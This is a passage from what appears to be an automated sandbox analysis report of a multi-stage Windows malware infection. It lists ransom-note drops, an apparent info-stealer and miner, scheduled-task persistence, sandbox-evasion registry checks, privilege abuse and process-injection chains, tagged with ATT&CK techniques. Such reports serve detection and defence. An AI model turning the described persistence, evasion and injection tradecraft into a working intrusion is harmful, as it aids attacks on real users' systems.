File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\Nav.js	ld.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib-amd\customizations\customizable.js	ld.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SplashScreen.scale-100_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_targetsize-48.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreSmallTile.scale-100.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main-selector.css	ld.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Notifications\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ppd.xrm-ms	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-24_contrast-black.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\Assets\Icons\StickyNotesAppList.targetsize-48_altform-lightunplated_contrast-white.png	ld.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\Theme_Illustration_Seasons_Winter_Center_Dark.svg	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\HOW TO BACK FILES.txt	ld.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\AppxMetadata\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\RADIAL.ELM	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_1.0.38.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-60_altform-unplated_contrast-white.png	ld.exe
File created	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_10.0.561.0_neutral_~_8wekyb3d8bbwe\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Assets\Fonts\CortanaMDL2Assets.ttf	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\WeatherStub.winmd	ld.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\ResiliencyLinks\v8_context_snapshot.bin.DATA	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\es-es\HOW TO BACK FILES.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\Assets\contrast-white\CameraAppList.targetsize-48.png	ld.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\ui-strings.js	ld.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\tr.pak.DATA	ld.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt	ld.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	ld.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxLargeTile.scale-400.png	ld.exe

Drops file in Windows directory 3 IoCs

Processes:

ama.exerandom.exeFreshbuild.exe

description	ioc	Process
File created	C:\Windows\Tasks\MSI.CentralServer.job	ama.exe
File created	C:\Windows\Tasks\axplong.job	random.exe
File created	C:\Windows\Tasks\Hkbsse.job	Freshbuild.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
3780	sc.exe
2644	sc.exe
6448	sc.exe
3816	sc.exe
5664	sc.exe
5276	sc.exe
2304	sc.exe
7012	sc.exe
3420	sc.exe
4800	sc.exe
2000	sc.exe
5200	sc.exe
2480	sc.exe
6124	sc.exe
5060	sc.exe
6000	sc.exe
2312	sc.exe
4292	sc.exe
6880	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
behavioral1/files/0x000100000002b8dc-27547.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3936	1064	WerFault.exe	111
712	3628	WerFault.exe	122
1868	2888	WerFault.exe	126
3828	4032	WerFault.exe	109
4516	3564	WerFault.exe	313
5612	3296	WerFault.exe	349
4816	5336	WerFault.exe	361
5948	4184	WerFault.exe	450
7856	7464	WerFault.exe	479

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
behavioral1/files/0x000300000002aa46-28857.dat	nsis_installer_1
behavioral1/files/0x000300000002aa46-28857.dat	nsis_installer_2
behavioral1/files/0x000200000002b9a7-30491.dat	nsis_installer_1
behavioral1/files/0x000200000002b9a7-30491.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

aspnet_regiis.exestealc_zov.exehellminer.exewmiprvse.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	aspnet_regiis.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_zov.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	hellminer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	hellminer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	hellminer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	hellminer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_zov.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	hellminer.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Delays execution with timeout.exe 2 IoCs

evasion

Processes:

timeout.exetimeout.exe

pid	Process
6800	timeout.exe
4832	timeout.exe

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

Processes:

net.exenet.exe

pid	Process
3716	net.exe
3840	net.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exe

pid	Process
2212	tasklist.exe
5844	tasklist.exe

Kills process with taskkill 2 IoCs

evasion

Processes:

taskkill.exetaskkill.exe

pid	Process
3948	taskkill.exe
5816	taskkill.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Modifies registry class 1 IoCs

Processes:

Opolis.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Opolis.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
3636	PING.EXE
3348	PING.EXE
7556	PING.EXE
3856	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
3256	schtasks.exe
5832	schtasks.exe
5712	schtasks.exe
4256	schtasks.exe
7204	schtasks.exe
4108	schtasks.exe
5924	schtasks.exe
5660	schtasks.exe
2000	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

IerLRtXpEcMnUjz.exe

pid	Process
2780	IerLRtXpEcMnUjz.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exedrivermanager.exerandom.exeaxplong.exeaxplong.exeRegAsm.exenewbuild.exeld.exepowershell.exeIerLRtXpEcMnUjz.exepowershell.exepowershell.exeaxplong.exepowershell.exepowershell.exeaspnet_regiis.exepowershell.exe

pid	Process
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
560	drivermanager.exe
560	drivermanager.exe
4936	random.exe
4936	random.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
3908	axplong.exe
3908	axplong.exe
1448	axplong.exe
1448	axplong.exe
1004	RegAsm.exe
1004	RegAsm.exe
1004	RegAsm.exe
1004	RegAsm.exe
5040	newbuild.exe
5040	newbuild.exe
5040	newbuild.exe
5040	newbuild.exe
2288	ld.exe
2288	ld.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe
2776	IerLRtXpEcMnUjz.exe
2776	IerLRtXpEcMnUjz.exe
4908	powershell.exe
4908	powershell.exe
4908	powershell.exe
2776	IerLRtXpEcMnUjz.exe
3328	powershell.exe
3328	powershell.exe
2776	IerLRtXpEcMnUjz.exe
3328	powershell.exe
5168	axplong.exe
5168	axplong.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
2288	ld.exe
2288	ld.exe
6284	powershell.exe
6284	powershell.exe
6284	powershell.exe
4032	aspnet_regiis.exe
4032	aspnet_regiis.exe
3936	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

twapcdhuj20shds2WOP90sdhy.exe

pid	Process
5452	twapcdhuj20shds2WOP90sdhy.exe
5452	twapcdhuj20shds2WOP90sdhy.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4363463463464363463463463.exeGoogle%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exes.exeMSBuild.exedrivermanager.exenewfile_setup.exeMSBuild.exeRegAsm.exenewbuild.exeld.exejsc.exe

description	pid	Process
Token: SeDebugPrivilege	4308	4363463463464363463463463.exe
Token: SeDebugPrivilege	3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
Token: SeDebugPrivilege	2452	s.exe
Token: SeDebugPrivilege	1104	MSBuild.exe
Token: SeBackupPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeDebugPrivilege	560	drivermanager.exe
Token: SeDebugPrivilege	2756	newfile_setup.exe
Token: SeDebugPrivilege	2956	MSBuild.exe
Token: SeBackupPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeBackupPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeDebugPrivilege	1004	RegAsm.exe
Token: SeBackupPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeDebugPrivilege	5040	newbuild.exe
Token: SeBackupPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeSecurityPrivilege	1104	MSBuild.exe
Token: SeBackupPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeSecurityPrivilege	2956	MSBuild.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeDebugPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeDebugPrivilege	2424	jsc.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe
Token: SeTakeOwnershipPrivilege	2288	ld.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Opolis.exetwapcdhuj20shds2WOP90sdhy.exe

pid	Process
3808	Opolis.exe
3808	Opolis.exe
5452	twapcdhuj20shds2WOP90sdhy.exe
5452	twapcdhuj20shds2WOP90sdhy.exe

Suspicious use of SendNotifyMessage 2 IoCs

Processes:

twapcdhuj20shds2WOP90sdhy.exe

pid	Process
5452	twapcdhuj20shds2WOP90sdhy.exe
5452	twapcdhuj20shds2WOP90sdhy.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

IerLRtXpEcMnUjz.exe

pid	Process
2780	IerLRtXpEcMnUjz.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exew.exexcdaxfszx.exedrivermanager.exeGoogle%20Chrome%20Sandbox%20Final.%e2%80%aefdp.execmd.exenewfile_setup.exe

description	pid	Process	procid_target
PID 4308 wrote to memory of 2608	4308	4363463463464363463463463.exe	81
PID 4308 wrote to memory of 2608	4308	4363463463464363463463463.exe	81
PID 4308 wrote to memory of 2608	4308	4363463463464363463463463.exe	81
PID 2608 wrote to memory of 2452	2608	w.exe	82
PID 2608 wrote to memory of 2452	2608	w.exe	82
PID 2608 wrote to memory of 2452	2608	w.exe	82
PID 4308 wrote to memory of 3924	4308	4363463463464363463463463.exe	85
PID 4308 wrote to memory of 3924	4308	4363463463464363463463463.exe	85
PID 4308 wrote to memory of 3924	4308	4363463463464363463463463.exe	85
PID 4308 wrote to memory of 4752	4308	4363463463464363463463463.exe	87
PID 4308 wrote to memory of 4752	4308	4363463463464363463463463.exe	87
PID 4308 wrote to memory of 4752	4308	4363463463464363463463463.exe	87
PID 4308 wrote to memory of 4264	4308	4363463463464363463463463.exe	88
PID 4308 wrote to memory of 4264	4308	4363463463464363463463463.exe	88
PID 4308 wrote to memory of 4264	4308	4363463463464363463463463.exe	88
PID 4308 wrote to memory of 3808	4308	4363463463464363463463463.exe	89
PID 4308 wrote to memory of 3808	4308	4363463463464363463463463.exe	89
PID 4308 wrote to memory of 3808	4308	4363463463464363463463463.exe	89
PID 4308 wrote to memory of 2752	4308	4363463463464363463463463.exe	90
PID 4308 wrote to memory of 2752	4308	4363463463464363463463463.exe	90
PID 4308 wrote to memory of 2752	4308	4363463463464363463463463.exe	90
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 2752 wrote to memory of 1104	2752	xcdaxfszx.exe	92
PID 4308 wrote to memory of 560	4308	4363463463464363463463463.exe	93
PID 4308 wrote to memory of 560	4308	4363463463464363463463463.exe	93
PID 4308 wrote to memory of 560	4308	4363463463464363463463463.exe	93
PID 560 wrote to memory of 960	560	drivermanager.exe	94
PID 560 wrote to memory of 960	560	drivermanager.exe	94
PID 560 wrote to memory of 960	560	drivermanager.exe	94
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 560 wrote to memory of 3336	560	drivermanager.exe	95
PID 4308 wrote to memory of 4936	4308	4363463463464363463463463.exe	96
PID 4308 wrote to memory of 4936	4308	4363463463464363463463463.exe	96
PID 4308 wrote to memory of 4936	4308	4363463463464363463463463.exe	96
PID 3924 wrote to memory of 2320	3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe	97
PID 3924 wrote to memory of 2320	3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe	97
PID 3924 wrote to memory of 2320	3924	Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe	97
PID 2320 wrote to memory of 3636	2320	cmd.exe	99
PID 2320 wrote to memory of 3636	2320	cmd.exe	99
PID 2320 wrote to memory of 3636	2320	cmd.exe	99
PID 4308 wrote to memory of 2756	4308	4363463463464363463463463.exe	100
PID 4308 wrote to memory of 2756	4308	4363463463464363463463463.exe	100
PID 4308 wrote to memory of 2756	4308	4363463463464363463463463.exe	100
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101
PID 2756 wrote to memory of 2956	2756	newfile_setup.exe	101

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

ld.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	ld.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:640
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:484

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:996

C:\Windows\System32\svchost.exe
